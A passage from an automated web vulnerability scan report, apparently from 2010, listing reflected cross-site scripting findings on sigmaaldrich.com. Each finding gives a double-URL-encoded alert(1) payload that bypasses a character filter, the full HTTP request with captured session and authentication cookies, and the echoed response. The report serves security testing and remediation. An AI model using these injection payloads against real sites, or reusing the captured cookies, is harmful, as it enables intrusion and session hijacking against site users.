bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:01 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level6e3b7";alert(1)//fa9c6485d2b/corporate/worldwide-offices.html","E404") ;
   </script>
...[SNIP]...

1.632. http://www.sigmaaldrich.com/site-level/corporate/worldwide-offices.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/worldwide-offices.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a495e%2522%253balert%25281%2529%252f%252fbe03d49ade4 was submitted in the REST URL parameter 2. This input was echoed as a495e";alert(1)//be03d49ade4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/corporatea495e%2522%253balert%25281%2529%252f%252fbe03d49ade4/worldwide-offices.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:03 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/corporatea495e";alert(1)//be03d49ade4/worldwide-offices.html","E404") ;
   </script>
...[SNIP]...

1.633. http://www.sigmaaldrich.com/site-level/corporate/worldwide-offices.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/worldwide-offices.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1861e%2522%253balert%25281%2529%252f%252fa042e9096a8 was submitted in the REST URL parameter 3. This input was echoed as 1861e";alert(1)//a042e9096a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/corporate/1861e%2522%253balert%25281%2529%252f%252fa042e9096a8 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:05 GMT
Content-Length: 28925
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/corporate/1861e";alert(1)//a042e9096a8","E404") ;
   </script>
...[SNIP]...

1.634. http://www.sigmaaldrich.com/site-level/mobile.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/mobile.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d9d4%2522%253balert%25281%2529%252f%252f74a37f61ea7 was submitted in the REST URL parameter 1. This input was echoed as 9d9d4";alert(1)//74a37f61ea7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level9d9d4%2522%253balert%25281%2529%252f%252f74a37f61ea7/mobile.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:56 GMT
Content-Length: 28926
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level9d9d4";alert(1)//74a37f61ea7/mobile.html","E404") ;
   </script>
...[SNIP]...

1.635. http://www.sigmaaldrich.com/site-level/mobile.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/mobile.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7404%2522%253balert%25281%2529%252f%252fc8a0e85a4c1 was submitted in the REST URL parameter 2. This input was echoed as b7404";alert(1)//c8a0e85a4c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/b7404%2522%253balert%25281%2529%252f%252fc8a0e85a4c1 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:58 GMT
Content-Length: 28915
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/b7404";alert(1)//c8a0e85a4c1","E404") ;
   </script>
...[SNIP]...

1.636. http://www.sigmaaldrich.com/technical-service-home/product-catalog.flagdisplay.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /technical-service-home/product-catalog.flagdisplay.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48d6b%2522%253balert%25281%2529%252f%252f9ec1da5ca1b was submitted in the REST URL parameter 1. This input was echoed as 48d6b";alert(1)//9ec1da5ca1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /technical-service-home48d6b%2522%253balert%25281%2529%252f%252f9ec1da5ca1b/product-catalog.flagdisplay.js?id=1289930010680 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/technical-service-home/product-catalog.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":3,"to":2.8,"c":"http://www.sigmaaldrich.com/catalog/Lookup.do","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1289930591682}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FN5%3DAll%26N3%3Dmode%2Bmatchpartialmax%26N4%3D%2560%26D7%3D0%26D10%3D%2560%26N1%3DS_ID%26ST%3DRS%26N25%3D0%26F%3DPR%22%2C%22t%22%3A1289930591511%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22l%22%3A%22Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%20Results%22%2C%22nw%22%3A784%2C%22nl%22%3A92%7D%7D; fsr.a=1289930591838

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:09 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28957


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/technical-service-home48d6b";alert(1)//9ec1da5ca1b/product-catalog.flagdisplay.js","E404") ;
   </script>
...[SNIP]...

1.637. http://www.sigmaaldrich.com/technical-service-home/product-catalog.flagdisplay.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /technical-service-home/product-catalog.flagdisplay.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c51cf%2522%253balert%25281%2529%252f%252f43420a37288 was submitted in the REST URL parameter 2. This input was echoed as c51cf";alert(1)//43420a37288 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

